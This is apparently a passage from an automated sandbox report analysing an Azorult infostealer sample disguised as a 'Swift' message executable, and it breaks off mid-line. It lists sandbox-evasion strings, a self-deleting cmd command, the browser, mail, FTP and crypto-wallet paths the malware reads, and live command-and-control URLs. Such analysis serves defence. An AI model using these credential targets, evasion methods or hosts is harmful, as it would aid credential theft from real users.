Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060176873.0000000001825000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW9^

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_10001B18

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Code function: 1_2_02AF06AF rdtsc

1_2_02AF06AF

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AFC4B4 mov eax, dword ptr fs:[00000030h]	1_2_02AFC4B4
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF688B mov eax, dword ptr fs:[00000030h]	1_2_02AF688B
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02B1345E mov eax, dword ptr fs:[00000030h]	1_2_02B1345E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF692A mov eax, dword ptr fs:[00000030h]	1_2_02AF692A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02AF6927 mov eax, dword ptr fs:[00000030h]	1_2_02AF6927
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Code function: 1_2_02B11118 mov eax, dword ptr fs:[00000030h]	1_2_02B11118

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Code function: 1_2_02B0FF3F CreateFileA,LdrLoadDll,

1_2_02B0FF3F

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process created: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

1_2_00403373

Stealing of Sensitive Information

Yara detected Azorult

Source: Yara match	File source: 00000004.00000003.8040635695.000000001D9B8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.8078319161.000000001D460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.8040702551.000000001D9BC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Swift Mesaj#U0131#09971.exe PID: 3172, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\			Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml

Jump to behavior

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: >%appdata%\Electrum-LTC\wallets\Electrum\wallets\tlooka\\ZxcvbnData\Login Datajsondll
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: >%appdata%\Electrum-LTC\wallets\Electrum\wallets\tlooka\\ZxcvbnData\Login Datajsondll
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Exodus\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Exodus\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: >%appdata%\Electrum-LTC\wallets\Electrum\wallets\tlooka\\ZxcvbnData\Login Datajsondll

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml			Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: 4.2.Swift Mesaj#U0131#09971.exe.1e2ce63c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c94d2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c38e3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Swift Mesaj#U0131#09971.exe PID: 3172, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	1 Windows Service	1 Access Token Manipulation	1 Timestomp	2 Credentials in Registry	26 System Information Discovery	Remote Desktop Protocol	4 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	1 Registry Run Keys / Startup Folder	1 Windows Service	1 DLL Side-Loading	1 Credentials In Files	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	11 Process Injection	1 File Deletion	NTDS	11 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Virtualization/Sandbox Evasion	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Swift Mesaj#U0131#09971.exe	10%	Virustotal		Browse
Swift Mesaj#U0131#09971.exe	2%	ReversingLabs	Win32.Downloader.Minix

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-multibyte-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-private-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-runtime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-stdio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-time-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-utility-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\freebl3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\mozglue.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\nss3.dll	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\nssdbm3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\softokn3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\ucrtbase.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E0F35830\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
aapancart.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://dbxo1.shop/db1/index.phpft	0%	Avira URL Cloud	safe
https://aapancart.com/	2%	Virustotal		Browse
http://dbxo1.shop/db1/index.php	0%	Avira URL Cloud	safe
https://aapancart.com/	0%	Avira URL Cloud	safe
http://dbxo1.shop/db1/index.phpl	0%	Avira URL Cloud	safe
http://dbxo1.shop/db1/index.phpp	0%	Avira URL Cloud	safe
http://dbxo1.shop/	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	Avira URL Cloud	safe
http://www.mozilla.com0	0%	Avira URL Cloud	safe
http://dbxo1.shop/nr	0%	Avira URL Cloud	safe
http://dbxo1.shop/db1/index.phpC	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
aapancart.com	103.14.99.114	true	false	2%, Virustotal, Browse	unknown
dbxo1.shop	172.67.203.65	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://dbxo1.shop/db1/index.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aapancart.com/	Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060357272.000000000183A000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://dbxo1.shop/db1/index.phpp	Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.4.dr	false		high
http://dbxo1.shop/db1/index.phpft	Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dbxo1.shop/db1/index.phpl	Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078319161.000000001D460000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	false		high
http://dbxo1.shop/	Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com0	Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift 